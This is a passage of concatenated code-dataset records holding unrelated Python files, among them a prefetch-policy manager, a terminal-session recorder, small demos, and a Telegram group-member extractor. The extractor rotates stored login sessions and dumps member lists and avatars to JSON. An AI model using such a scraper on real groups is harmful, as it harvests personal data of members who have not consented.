bpc3, sys_bw, hwpf_status, swpf_status, revert_status) = struct.unpack(conf.STRUCT_FMTSTR, data)\n \n if not revert and swpf_status == ENUMS.SWPF_JIT_ACTIVE:\n break\n elif revert and swpf_status == 0:\n break\n time.sleep(conf.SLEEP_TIME)\n\ndef wait_for_hwpf_throttle(hwpf_change_to, conf):\n\n print >> sys.stderr, \"POLMAN -- waiting for HWPF to change to %d\"%(hwpf_change_to)\n\n fd = conf.rp\n\n while True:\n data = nonblocking_readlines(fd, conf)\n if not data:\n time.sleep(conf.SLEEP_TIME)\n continue\n (comm_type, core0, core1, core2, core3, bpc0, bpc1, bpc2, bpc3, sys_bw, hwpf_status, swpf_status, revert) = struct.unpack(conf.STRUCT_FMTSTR, data)\n \n if hwpf_status == hwpf_change_to:\n break\n time.sleep(conf.SLEEP_TIME)\n\ndef ready_this_policy(policy, conf):\n\n print >> sys.stderr, \"\\n----------------------------\"\n print >> sys.stderr, \"POLMAN -- readying policy %s\"%(policy)\n \n \n conf.ENABLED_SWPF = False\n\n hwpf_change_to = ENUMS.HWPF_ON\n\n if policy == \"hwpf\":\n \n rev = ENUMS.REVERT_TO_ORIG\n if conf.curr_policy == \"hwpf\" or conf.curr_policy == \"nopref\":\n rev = ENUMS.NO_REVERT_TO_PREV\n \n snd_data = struct.pack(\"iiiiifffffiii\", ENUMS.PRT_COMM_RECV, 0, 1, 2, 3, \\\n 0.0, 0.0, 0.0, 0.0, 0.0, \\\n ENUMS.HWPF_ON, 0, rev)\n elif policy == \"swpf\":\n snd_data = struct.pack(\"iiiiifffffiii\", ENUMS.PRT_COMM_RECV, 0, 1, 2, 3, \\\n 0.0, 0.0, 0.0, 0.0, 0.0, \\\n ENUMS.HWPF_OFF, ENUMS.SWPF_8MBLLC, ENUMS.NO_REVERT_TO_PREV)\n \n hwpf_change_to = ENUMS.HWPF_OFF\n\n elif policy == \"l1hwpfswpf\":\n snd_data = struct.pack(\"iiiiifffffiii\", ENUMS.PRT_COMM_RECV, 0, 1, 2, 3, \\\n 0.0, 0.0, 0.0, 0.0, 0.0, \\\n ENUMS.LLC_HWPF_OFF, ENUMS.SWPF_8MBLLC, ENUMS.NO_REVERT_TO_PREV)\n\n hwpf_change_to = ENUMS.LLC_HWPF_OFF\n\n elif policy == \"hwpfswpf\":\n snd_data = struct.pack(\"iiiiifffffiii\", ENUMS.PRT_COMM_RECV, 0, 1, 2, 3, \\\n 0.0, 0.0, 0.0, 0.0, 0.0, \\\n ENUMS.HWPF_ON, ENUMS.SWPF_8MBLLC, ENUMS.NO_REVERT_TO_PREV)\n\n hwpf_change_to = ENUMS.HWPF_ON\n\n elif policy == \"nopref\":\n snd_data = struct.pack(\"iiiiifffffiii\", ENUMS.PRT_COMM_RECV, 0, 1, 2, 3, \\\n 0.0, 0.0, 0.0, 0.0, 0.0, \\\n ENUMS.HWPF_OFF, 0, ENUMS.REVERT_TO_ORIG)\n\n hwpf_change_to = ENUMS.HWPF_OFF\n \n for fd in conf.wp:\n send_data(fd, snd_data)\n\n revert = False\n if (conf.curr_policy == \"hwpf\" or conf.curr_policy == \"nopref\") and policy != conf.curr_policy:\n conf.ENABLED_SWPF = True\n elif (conf.curr_policy != \"hwpf\" and conf.curr_policy != \"nopref\") and (policy == \"hwpf\" or policy == \"nopref\"):#policy != conf.curr_policy:\n revert = True\n\n if conf.ENABLED_SWPF:\n wait_for_JIT(conf, revert)\n elif revert:\n wait_for_JIT(conf, revert)\n\n wait_for_hwpf_throttle(hwpf_change_to, conf)\n\n conf.curr_policy = policy\n\n print >> sys.stderr, \"POLMAN -- policy %s is ready on all cores at %f seconds\"%(policy, time.time() - conf.start_time)\n\ndef reset_AVG_PERF_BOOK():\n \n return\n for policy in AVG_PERF_BOOK:\n #if policy == \"hwpf\":\n # continue\n AVG_PERF_BOOK[policy] = [0.0, 0.0, 0.0, 0.0]\n\ndef reexplore_winning(conf):\n \n print >> sys.stderr, \"POLMAN -- starting Re-exploration at %f seconds\"%(time.time() - conf.start_time)\n\n curr_max_perf_policy = conf.max_perf_policy\n\n explore_policies(conf)\n\n if curr_max_perf_policy == conf.max_perf_policy:\n conf.backoff_reexp_time += conf.REEXP_TIME\n else:\n conf.backoff_reexp_time = conf.REEXP_TIME\n\n conf.REP_REEXP -= 1\n\ndef explore_policies(conf):\n\n total_states = len(EXP_PLAN[conf.NUM_APPS])\n\n num_mon_wins = int(conf.MON_EPOCH / conf.SLEEP_TIME)\n\n conf.max_perf_policy = conf.baseline\n conf.max_thruput = 1.0\n \n retries = 0\n \n while retries < conf.RETRIES:\n \n reset_AVG_PERF_BOOK()\n \n for rep_idx in range(num_mon_wins):\n \n for exp_plan_idx in range(total_states):\n \n policy = EXP_PLAN[conf.NUM_APPS][exp_plan_idx]\n ready_this_policy(policy, conf)\n monitor_perf(EXP_PLAN[conf.NUM_APPS][exp_plan_idx], conf.SLEEP_TIME, conf)\n \n for policy in EXP_PLAN[conf.NUM_APPS]:\n \n if policy == conf.baseline:\n continue\n \n bpc_list = AVG_PERF_BOOK[policy]\n ws = compute_weighted_speedup(bpc_list, conf)\n PERF_BOOK[policy] = ws\n \n if ws > conf.max_thruput:\n conf.max_thruput = ws\n conf.max_perf_policy = policy\n\n print >> sys.stderr, \"policy %s -- weighted speedup %f\"%(policy, ws)\n \n retries += 1\n if conf.max_perf_policy != conf.baseline:\n break\n \n# for test_policy in EXP_PLAN[conf.NUM_APPS]:\n#\n# retries = 0\n# exp_list = [conf.baseline, test_policy]\n#\n# while retries < conf.RETRIES:\n#\n# reset_AVG_PERF_BOOK()\n#\n# for rep_idx in range(num_mon_wins):\n#\n# for policy in exp_list:\n# ready_this_policy(policy, conf)\n# monitor_perf(policy, conf.SLEEP_TIME, conf)\n# \n# bpc_list = AVG_PERF_BOOK[test_policy]\n# ws = compute_weighted_speedup(bpc_list, conf)\n# PERF_BOOK[test_policy] = ws\n# \n# if ws > conf.max_thruput:\n# conf.max_thruput = ws\n# conf.max_perf_policy = test_policy\n# \n# print >> sys.stderr, \"policy %s -- weighted speedup %f\"%(policy, ws)\n#\n# retries += 1\n# if conf.max_perf_policy == test_policy:\n# break\n\n conf.curr_ws = conf.max_thruput\n\ndef monitor_best_policy(conf):\n\n mon_list = [conf.max_perf_policy] #[conf.baseline, conf.max_perf_policy]\n\n if conf.mon_baseline_after == 0:\n mon_list = [conf.baseline, conf.max_perf_policy]\n conf.mon_baseline_after = conf.MON_BASELINE_AFTER_ITER\n\n reset_AVG_PERF_BOOK()\n \n for policy in mon_list:\n \n ready_this_policy(policy, conf)\n monitor_perf(policy, conf.MON_EPOCH, conf)\n\n bpc_list = AVG_PERF_BOOK[conf.max_perf_policy]\n ws = compute_weighted_speedup(bpc_list, conf)\n PERF_BOOK[conf.max_perf_policy] = ws\n \n if ws > conf.max_thruput:\n conf.max_thruput = ws\n \n conf.curr_ws = ws\n\n if conf.curr_ws < 1.0:\n conf.falsepos_count += 1\n else:\n conf.falsepos_count -= 1\n\n# ready_this_policy(conf.max_perf_policy, conf)\n\n conf.mon_baseline_after -= 1\n\n print >> sys.stderr, \"policy %s -- weighted speedup %f -- falsepos_count %d\"%(policy, ws, conf.falsepos_count)\n\ndef main():\n \n start_time = time.time()\n \n time.sleep(1)\n conf = Conf()\n conf.start_time = start_time\n #ignore the first 10 seconds\n time.sleep(9)\n\n exp_plan_idx = 0\n\n total_states = len(EXP_PLAN[conf.NUM_APPS])\n\n while True:\n \n print >> sys.stderr, \"POLMAN -- entering exploration phase\"\n \n time.sleep(conf.SLEEP_TIME) # sleep for 100 milli-seconds -- 2X the protean runtime\n \n #retries = 0\n #while retries < conf.RETRIES and conf.max_perf_policy != policy:\n explore_policies(conf)\n\n #apply policy with max performance\n print >> sys.stderr, \"POLMAN -- Applying best prefetching policy: %s\"%(conf.max_perf_policy)\n ready_this_policy(conf.max_perf_policy, conf)\n\n #conf.RETRIES = 3\n\n time_passed = time.time() - conf.start_time\n\n re_explore_in = conf.REEXP_TIME + time_passed\n\n while conf.EXIT_AFTER > time_passed:\n\n print >> sys.stderr, \"POLMAN -- re-explore in %f\"%(re_explore_in - time_passed)\n \n if (re_explore_in - time_passed) < 0.1 and conf.REP_REEXP > 0:\n reexplore_winning(conf)\n #apply policy with max performance\n print >> sys.stderr, \"POLMAN -- Applying best prefetching policy after re-exploration: %s\"%(conf.max_perf_policy)\n ready_this_policy(conf.max_perf_policy, conf)\n time_passed = time.time() - conf.start_time\n re_explore_in = conf.backoff_reexp_time + time_passed\n conf.falsepos_count = 0\n \n if conf.curr_policy != conf.baseline:\n monitor_best_policy(conf)\n \n #If too many false positives occur, revert to baseline policy\n if conf.falsepos_count == conf.falsepos_thr:\n conf.reexp_fail_count += 1\n ready_this_policy(conf.baseline, conf)\n if conf.reexp_fail_count == conf.REEXP_FAIL_THR:\n print >> sys.stderr, \"POLMAN -- Abondoning exploration...\"\n break\n conf.falsepos_count = 0\n re_explore_in = time_passed + 0 # restart re-exploration immediately\n print >> sys.stderr, \"POLMAN -- Reverting to baseline policy: %s -- optimization failed %d\"%(conf.baseline, conf.reexp_fail_count)\n print >> sys.stderr, \"POLMAN -- Starting Re-exploration soon...\"\n else:\n sleep_for = re_explore_in - time_passed\n if sleep_for > 0:\n time.sleep(sleep_for)\n #break\n\n if conf.REP_REEXP == 0:\n break\n\n time_passed = time.time() - conf.start_time\n\n break\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"pol_man_inter.py","file_name":"pol_man_inter.py","file_ext":"py","file_size_in_byte":17919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"444166586","text":"# 66. 加一\n# 给定一个由 整数 组成的 非空 数组所表示的非负整数,在该数的基础上加一。\n# 最高位数字存放在数组的首位, 数组中每个元素只存储单个数字。\n# 你可以假设除了整数 0 之外,这个整数不会以零开头。\n\nclass Solution:\n def plusOne(self, digits: List[int]) -> List[int]:\n # count = 0\n # # 需要保持前置0的个数 [0,0] -> [0,1]\n # for i in range(len(digits)-1):\n # if digits[i]:\n # break\n # count += 1\n # num = int(\"\".join([str(x) for x in digits])) + 1\n # return [0] * count + [int(x) for x in list(str(num))]\n \n # 逢9进一 time:最好O(1),最坏O(n) space:O(1)\n digits = [0] + digits\n for i in range(len(digits)-1,-1,-1):\n if digits[i] != 9:\n digits[i] += 1\n break\n else:\n digits[i] = 0\n if digits[0] == 0:\n return digits[1:] \n else:\n return digits","sub_path":"Week_01/plusOne.py","file_name":"plusOne.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"251224568","text":"#!python\n# -*- coding: utf-8 -*-\nimport traceback\nimport os\nimport json\nimport time\n\nimport numpy as np\nfrom sklearn import metrics\nimport model\n\ndef main():\n '''load test data and calls the model predict function\n '''\n X_test = np.load('X_test.npy')\n y_test = np.load('y_test.npy')\n start_time = time.time()\n y_predict = model.predict(X_test)\n elapsed_time = time.time() - start_time # in second\n acc = metrics.accuracy_score(y_test, y_predict)\n return {'time': elapsed_time, 'acc': acc}\nif __name__==\"__main__\":\n try:\n result_json = main()\n except Exception as err:\n print('Your code failed to run. Reason :')\n print(err)\n traceback.print_tb(err.__traceback__)\n exit(-1)\n result_str = json.dumps(result_json)\n with open('model/result.txt', 'w') as f:\n f.write(result_str)\n","sub_path":"mnist/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"404153002","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Feb 9 18:14:14 2019\r\n\r\n@author: Administrator\r\n\"\"\"\r\nimport turtle\r\nimport time\r\n\r\nturtle.setup(width=0.5,height=0.7)\r\nturtle.screensize(50,50,\"purple\")\r\nturtle.pensize(5)\r\nturtle.speed(1)\r\nturtle.pencolor(\"yellow\")\r\nturtle.fillcolor(\"blue\")\r\nturtle.shape(\"turtle\")\r\n\r\nturtle.begin_fill()\r\n\r\nfor _ in range(7):\r\n turtle.forward(250)\r\n turtle.right(102.86)\r\nturtle.end_fill()\r\ntime.sleep(2)\r\n\r\nturtle.penup()\r\nturtle.goto(-150,-120)\r\nturtle.color(\"grey\")\r\nturtle.write(\"Done\", font=('Arial', 40, 'normal'))\r\ntime.sleep(1)\r\n\r\nturtle.done()\r\n\r\n","sub_path":"turtle_demo/turtle_七角星.py","file_name":"turtle_七角星.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"533385072","text":"import pygame\n\nclass Zombie(pygame.sprite.Sprite):\n def __init__(self, direction):\n # Call the parent class (Sprite) constructor\n super().__init__()\n self.image = pygame.Surface([4, 10])\n if direction == 'left':\n self.image = pygame.image.load('zombie_right.png').convert_alpha()\n elif direction == 'right':\n self.image = pygame.image.load('zombie_left.png').convert_alpha()\n self.rect = self.image.get_rect()\n self.direction = direction\n\n\n def update(self):\n if self.direction == 'left':\n self.rect.x += 50\n elif self.direction == 'right':\n self.rect.x -= 50\n","sub_path":"Zombie.py","file_name":"Zombie.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"534523029","text":"import datetime\nimport fcntl\nimport logging\nimport os\nimport pkg_resources\nimport pty\nimport re\nimport selectors\nimport struct\nimport termios\nimport tty\nfrom copy import copy\nfrom functools import partial\nfrom typing import Any, Callable, Dict, Generator, Iterable, Iterator, Tuple, Union\n\nimport pyte\nimport pyte.screens\nfrom Xlib import display, Xatom\nfrom Xlib.error import DisplayError\n\nfrom termtosvg.anim import CharacterCellConfig, CharacterCellLineEvent, CharacterCellRecord\nfrom termtosvg.asciicast import AsciiCastEvent, AsciiCastHeader, AsciiCastTheme\n\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\nXRESOURCES_DIR = os.path.join('data', 'Xresources')\n\n\nclass TerminalMode:\n \"\"\"Save terminal state on entry, restore it on exit\"\"\"\n def __init__(self, fileno: int):\n self.fileno = fileno\n self.mode = None\n\n def __enter__(self):\n try:\n self.mode = tty.tcgetattr(self.fileno)\n except tty.error:\n pass\n return self.mode\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.mode is not None:\n tty.tcsetattr(self.fileno, tty.TCSAFLUSH, self.mode)\n\n\ndef record(columns, lines, theme, input_fileno, output_fileno):\n # type: (int, int, Union[AsciiCastTheme, None], int, int) -> Generator[Union[AsciiCastHeader, AsciiCastEvent], None, None]\n \"\"\"Record a terminal session in asciicast v2 format\n\n The records returned are of two types:\n - a single header with configuration information\n - multiple event records with data captured from the terminal and timing information\n \"\"\"\n yield AsciiCastHeader(version=2, width=columns, height=lines, theme=theme)\n\n start = None\n for data, time in _record(columns, lines, input_fileno, output_fileno):\n if start is None:\n start = time\n\n yield AsciiCastEvent(time=(time - start).total_seconds(),\n event_type='o',\n event_data=data,\n duration=None)\n\n\ndef _record(columns, lines, input_fileno, output_fileno):\n # type: (int, int, int, int) -> Generator[Tuple[bytes, datetime.datetime], None, int]\n \"\"\"Record raw input and output of a shell session\n\n This function forks the current process. The child process is a shell which is a session\n leader and has a controlling terminal and is run in the background. The parent process, which\n runs in the foreground, transmits data between the standard input, output and the shell\n process and logs it. From the user point of view, it appears they are communicating with\n their shell (through their terminal emulator) when in fact they communicate with our parent\n process which logs all the data exchanged with the shell\n\n The implementation of this method is mostly copied from the pty.spawn function of the\n CPython standard library. It has been modified in order to make the record function a\n generator.\n See https://github.com/python/cpython/blob/master/Lib/pty.py\n\n :param columns: Initial number of columns of the terminal\n :param lines: Initial number of lines of the terminal\n :param input_fileno: File descriptor of the input data stream\n :param output_fileno: File descriptor of the output data stream\n \"\"\"\n shell = os.environ.get('SHELL', 'sh')\n\n pid, master_fd = pty.fork()\n if pid == 0:\n # Child process\n os.execlp(shell, shell)\n\n # Set the terminal size for master_fd\n ttysize = struct.pack(\"HHHH\", lines, columns, 0, 0)\n fcntl.ioctl(master_fd, termios.TIOCSWINSZ, ttysize)\n\n # Parent process\n try:\n tty.setraw(input_fileno)\n except tty.error:\n pass\n\n for data, time in _capture_data(input_fileno, output_fileno, master_fd):\n yield data, time\n\n os.close(master_fd)\n\n _, child_exit_status = os.waitpid(pid, 0)\n return child_exit_status\n\n\ndef _capture_data(input_fileno, output_fileno, master_fd, buffer_size=1024):\n # type: (int, int, int, int) -> Generator[bytes, datetime.datetime]\n \"\"\"Send data from input_fileno to master_fd and send data from master_fd to output_fileno and\n also return it to the caller\n\n The implementation of this method is mostly copied from the pty.spawn function of the\n CPython standard library. It has been modified in order to make the record function a\n generator.\n See https://github.com/python/cpython/blob/master/Lib/pty.py\n \"\"\"\n sel = selectors.DefaultSelector()\n sel.register(master_fd, selectors.EVENT_READ)\n sel.register(input_fileno, selectors.EVENT_READ)\n\n while {master_fd, input_fileno} <= set(sel.get_map()):\n events = sel.select()\n for key, _ in events:\n try:\n data = os.read(key.fileobj, buffer_size)\n except OSError:\n sel.unregister(key.fileobj)\n continue\n\n if not data:\n sel.unregister(key.fileobj)\n continue\n\n if key.fileobj == input_fileno:\n write_fileno = master_fd\n else:\n write_fileno = output_fileno\n yield data, datetime.datetime.now()\n\n while data:\n n = os.write(write_fileno, data)\n data = data[n:]\n\n\n# TODO: Fix overwriting\ndef _group_by_time(event_records, min_rec_duration, last_rec_duration):\n # type: (Iterable[AsciiCastEvent], float, float) -> Generator[AsciiCastEvent, None, None]\n \"\"\"Merge event records together if they are close enough and compute the duration between\n consecutive events. The duration between two consecutive event records returned by the function\n is guaranteed to be at least min_rec_duration.\n\n :param event_records: Sequence of records in asciicast v2 format\n :param min_rec_duration: Minimum time between two records returned by the function in seconds.\n This helps avoiding 0s duration animations which break SVG animations.\n :param last_rec_duration: Duration of the last record in seconds\n :return: Sequence of records\n \"\"\"\n current_string = b''\n current_time = None\n\n for event_record in event_records:\n if event_record.event_type != 'o':\n continue\n\n if current_time is not None:\n time_between_events = event_record.time - current_time\n if time_between_events >= min_rec_duration:\n accumulator_event = AsciiCastEvent(time=current_time,\n event_type='o',\n event_data=current_string,\n duration=time_between_events)\n yield accumulator_event\n current_string = b''\n current_time = event_record.time\n else:\n current_time = event_record.time\n\n current_string += event_record.event_data\n\n if current_string:\n accumulator_event = AsciiCastEvent(time=current_time,\n event_type='o',\n event_data=current_string,\n duration=last_rec_duration)\n yield accumulator_event\n\n\ndef replay(records, from_pyte_char, theme, min_frame_duration=0.001, last_frame_duration=1):\n # type: (Iterable[Union[AsciiCastHeader, AsciiCastEvent]], Callable[[pyte.screen.Char, Dict[Any, str]], Any], Union[None, AsciiCastTheme], float, float) -> Generator[CharacterCellRecord, None, None]\n \"\"\"Read the records of a terminal sessions, render the corresponding screens and return lines\n of the screen that need updating.\n\n Records are merged together so that there is at least a 'min_frame_duration' seconds pause\n between two rendered screens.\n Lines returned are sorted by time and duration of their appearance on the screen so that lines\n in need of updating at the same time can easily be grouped together.\n The terminal screen is rendered using Pyte and then each character of the screen is converted\n to the caller's format of choice using from_pyte_char\n\n :param records: Records of the terminal session in asciicast v2 format. The first record must\n be a header, which must be followed by event records.\n :param from_pyte_char: Conversion function from pyte.screen.Char to any other format\n :param min_frame_duration: Minimum frame duration in seconds. SVG animations break when an\n animation is 0s so setting this to at least 1ms is recommended.\n :param last_frame_duration: Last frame duration in seconds\n :return: Records in the CharacterCellRecord format:\n 1/ a header with configuration information (CharacterCellConfig)\n 2/ one event record for each line of the screen that need to be redrawn (CharacterCellLineEvent)\n \"\"\"\n def sort_by_time(d, row):\n row_line, row_line_time, row_line_duration = d[row]\n return row_line_time + row_line_duration, row\n\n if not isinstance(records, Iterator):\n records = iter(records)\n\n header = next(records)\n screen = pyte.Screen(header.width, header.height)\n stream = pyte.ByteStream(screen)\n\n if theme is not None:\n pass\n elif theme is None and header.theme is not None:\n theme = header.theme\n else:\n raise ValueError('No valid theme')\n\n config = CharacterCellConfig(width=header.width,\n height=header.height,\n text_color=theme.fg,\n background_color=theme.bg)\n yield config\n\n palette = {\n 'foreground': theme.fg,\n 'background': theme.bg\n }\n palette.update(enumerate(theme.palette.split(':')))\n\n pending_lines = {}\n current_time = 0\n last_cursor = None\n for event_record in _group_by_time(records, min_frame_duration, last_frame_duration):\n stream.feed(event_record.event_data)\n\n # Numbers of lines that must be redrawn\n dirty_lines = set(screen.dirty)\n if screen.cursor != last_cursor:\n # Line where the cursor will be drawn\n dirty_lines.add(screen.cursor.y)\n if last_cursor is not None:\n # Line where the cursor will be erased\n dirty_lines.add(last_cursor.y)\n\n redraw_buffer = {}\n for row in dirty_lines:\n redraw_buffer[row] = {}\n for column in screen.buffer[row]:\n redraw_buffer[row][column] = from_pyte_char(screen.buffer[row][column], palette)\n\n if screen.cursor != last_cursor:\n try:\n data = screen.buffer[screen.cursor.y][screen.cursor.x].data\n except KeyError:\n data = ' '\n\n cursor_char = pyte.screens.Char(data=data,\n fg=screen.cursor.attrs.fg,\n bg=screen.cursor.attrs.bg,\n reverse=True)\n redraw_buffer[screen.cursor.y][screen.cursor.x] = from_pyte_char(cursor_char, palette)\n\n last_cursor = copy(screen.cursor)\n screen.dirty.clear()\n\n completed_lines = {}\n # Conversion from seconds to milliseconds\n duration = int(1000 * round(event_record.duration, 3))\n for row in pending_lines:\n line, line_time, line_duration = pending_lines[row]\n if row in redraw_buffer:\n completed_lines[row] = line, line_time, line_duration\n else:\n pending_lines[row] = line, line_time, line_duration + duration\n\n for row in redraw_buffer:\n if redraw_buffer[row]:\n pending_lines[row] = redraw_buffer[row], current_time, duration\n elif row in pending_lines:\n del pending_lines[row]\n\n for row in sorted(completed_lines, key=partial(sort_by_time, completed_lines)):\n args = (row, *completed_lines[row])\n yield CharacterCellLineEvent(*args)\n\n current_time += duration\n\n for row in sorted(pending_lines, key=partial(sort_by_time, pending_lines)):\n args = (row, *pending_lines[row])\n yield CharacterCellLineEvent(*args)\n\n\ndef default_themes():\n # type: ()-> Dict[str, str]\n \"\"\"Return all the default color themes\"\"\"\n pattern = re.compile('base16-(?P.+).Xresources')\n themes = {}\n for file in pkg_resources.resource_listdir(__name__, XRESOURCES_DIR):\n match = pattern.fullmatch(file)\n if match:\n file_path = os.path.join(XRESOURCES_DIR, file)\n xresources_str = pkg_resources.resource_string(__name__, file_path).decode('utf-8')\n themes[match.group('theme_name')] = xresources_str\n return themes\n\n\ndef get_configuration(fileno):\n # type: (int) -> (int, int, AsciiCastTheme)\n \"\"\"Get configuration information related to terminal output rendering. If some information can\n not be gathered from the system, return the default configuration.\n \"\"\"\n try:\n columns, lines = os.get_terminal_size(fileno)\n except OSError as e:\n lines = 24\n columns = 80\n logger.debug('Failed to get terminal size ({}), using default values '\n 'instead ({}x{})'.format(e, columns, lines))\n\n try:\n xresources_str = _get_xresources()\n except DisplayError:\n logger.debug('Failed to gather color information from the Xserver')\n theme = None\n else:\n try:\n if xresources_str is None:\n logger.debug('No Xresources string returned')\n theme = None\n else:\n theme = AsciiCastTheme.from_xresources(xresources_str)\n except ValueError:\n logger.debug('Invalid Xresources string: \"{}\"'.format(xresources_str))\n theme = None\n\n return columns, lines, theme\n\n\ndef _get_xresources():\n # type: () -> Union[str, None]\n \"\"\"Query the X server for the Xresources string of the default display\"\"\"\n d = display.Display()\n data = d.screen(0).root.get_full_property(Xatom.RESOURCE_MANAGER,\n Xatom.STRING)\n if data is None:\n return None\n\n return data.value.decode('utf-8')","sub_path":"termtosvg/term.py","file_name":"term.py","file_ext":"py","file_size_in_byte":14290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"552771795","text":"\n# 获取telegram 群成员数据的程序入口\n\nimport os\nimport html\nimport json\nimport random\nfrom configparser import ConfigParser\nfrom service_app.model.telegram.src.TelegramChannelMemberExtractor import TGMemExtractor\n\n\ncurpath = os.path.dirname(os.path.realpath(__file__))\n\n\ndef extractor_get_member(username, html_code='0'):\n status = '0'\n member_count = 0\n data_result = ''\n try:\n cfg = ConfigParser()\n telegram_extractor_config_path = os.path.join(curpath, \"./config/telegram_extractor.ini\")\n cfg.read(telegram_extractor_config_path, encoding='utf-8')\n tg_session = cfg.get('login_setting', 'tg_session')\n tg_session_list = tg_session.split('||')\n # 随机选取一个session\n tg_session_choice = random.choice(tg_session_list).split(',')\n tg_session_name = os.path.join(curpath, 'config', tg_session_choice[0] + '.session')\n TG_api_id = int(tg_session_choice[1])\n TG_api_hash = tg_session_choice[2]\n print(tg_session_name)\n config = {\n 'TG_session_name': tg_session_name,\n 'TG_api_id': TG_api_id,\n 'TG_api_hash': TG_api_hash,\n 'proxy_address': cfg.get('proxy', 'proxy_address'),\n 'proxy_port': int(cfg.get('proxy', 'proxy_port') or 0),\n 'group_member': os.path.join(curpath, cfg.get('download_addr', 'group_member')),\n 'group_avatar': os.path.join(curpath, cfg.get('download_addr', 'group_avatar'))\n }\n # print(config)\n tg_mem_extrator = TGMemExtractor(config)\n flag = False\n tg_mem_extrator.set_channel(username)\n tg_mem_extrator.dump_to_json(flag)\n\n # 读取结果,返回\n file_name = username + \".json\"\n member_file_name = os.path.join(curpath, \"author\", file_name)\n fl = open(member_file_name, 'r', encoding='utf-8')\n file_read = fl.read()\n if len(file_read) > 0:\n status = '1'\n\n file_read_json = json.loads(file_read)\n data_result = file_read_json['data']\n try:\n member_count = file_read_json['data']['group_member_count']\n\n except Exception as e:\n member_count = 1\n\n print(member_count)\n\n except Exception as e:\n status = str(e)\n print(e)\n\n result = {\"status\": status, \"agent_type\": \"telegram\", \"fetch_type\": \"get_member\",\n \"data_item_count\": member_count, \"data\": data_result}\n json_result = json.dumps(result, ensure_ascii=False)\n # 为了在线显示图片\n json_result = json_result.replace('/home/kismanager/KIS/Fetch_Agent_Service/service_app',\n '/img')\n\n # 再进行html编码,这样最终flask输出才是合法的json\n html_result = html.escape(json_result)\n # html_code==1是方便浏览器展示字段内容为html的,默认情况返回json格式数据\n if html_code == '1':\n return html_result\n else:\n return json_result\n\n\ndef main():\n username = 'drafts4' # group\n # username = 'tieliu' # channel\n # username = '1306732370'\n result = extractor_get_member(username)\n print(result)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"service_app/model/telegram/get_member.py","file_name":"get_member.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"603739810","text":"num_1,num_2=int(input(\"Enter num1:\")),int(input(\"Enter num2:\"))\r\nset_1=set()\r\nset_2=set()\r\nfor i in range(1,num_1):\r\n if(num_1%i==0):\r\n set_1.add(i)\r\nfor i in range(1,num_2):\r\n if(num_2%i==0):\r\n set_2.add(i)\r\nlcm=(num_1*num_2)/max(set_1&set_2)\r\nprint(int(lcm))\r\n\r\n\r\n","sub_path":"Python/Find LCM.py","file_name":"Find LCM.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"302989428","text":"# -*- coding: utf-8 -*-\n\n#\n# Author: Tomi Jylhä-Ollila, Finland 2014-2016\n#\n# This file is part of Kunquat.\n#\n# CC0 1.0 Universal, http://creativecommons.org/publicdomain/zero/1.0/\n#\n# To the extent possible under law, Kunquat Affirmers have waived all\n# copyright and related or neighboring rights to Kunquat.\n#\n\nfrom PySide.QtCore import *\nfrom PySide.QtGui import *\n\n\nclass SilenceButton(QToolButton):\n\n def __init__(self):\n super().__init__()\n self._ui_model = None\n self._playback_manager = None\n\n self.setText('Silence')\n self.setToolTip('Silence (Period)')\n self.setAutoRaise(True)\n\n def set_ui_model(self, ui_model):\n self._ui_model = ui_model\n self._playback_manager = ui_model.get_playback_manager()\n\n icon_bank = self._ui_model.get_icon_bank()\n icon_path = icon_bank.get_icon_path('silence')\n icon = QIcon(icon_path)\n self.setIcon(icon)\n\n QObject.connect(self, SIGNAL('clicked()'),\n self._clicked)\n\n def unregister_updaters(self):\n pass\n\n def _clicked(self):\n self._playback_manager.stop_recording()\n self._ui_model.silence()\n\n","sub_path":"kunquat/tracker/ui/views/silencebutton.py","file_name":"silencebutton.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"128873795","text":"############################################################################\n# Copyright 2018 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n############################################################################\n# pylint: disable=locally-disabled, invalid-name, missing-docstring\n\n\"\"\"default gcc compiler configuration\n\"\"\"\nfrom parts.config import configuration\n\n\ndef map_default_version(env):\n return env['GCC_VERSION']\n\n\ndef enable_sanitizers(env, recover):\n \"\"\" Enable sanitizers\n Args:\n recover: Enable sanitizers recovery from errors found.\n \"\"\"\n version_minimum = 6\n version_major = int(map_default_version(env).partition('.')[0])\n if version_major >= version_minimum:\n env.AppendUnique(CCFLAGS=[\n '-g',\n '-fsanitize=address,undefined',\n '-fno-sanitize=alignment',\n '-fno-sanitize=shift',\n '-fno-omit-frame-pointer'])\n env.AppendUnique(LINKFLAGS=[\n '-fsanitize=address,undefined'])\n if recover:\n env.AppendUnique(CCFLAGS=[\n '-fsanitize-recover=all',\n '-fsanitize-recover=address'])\n 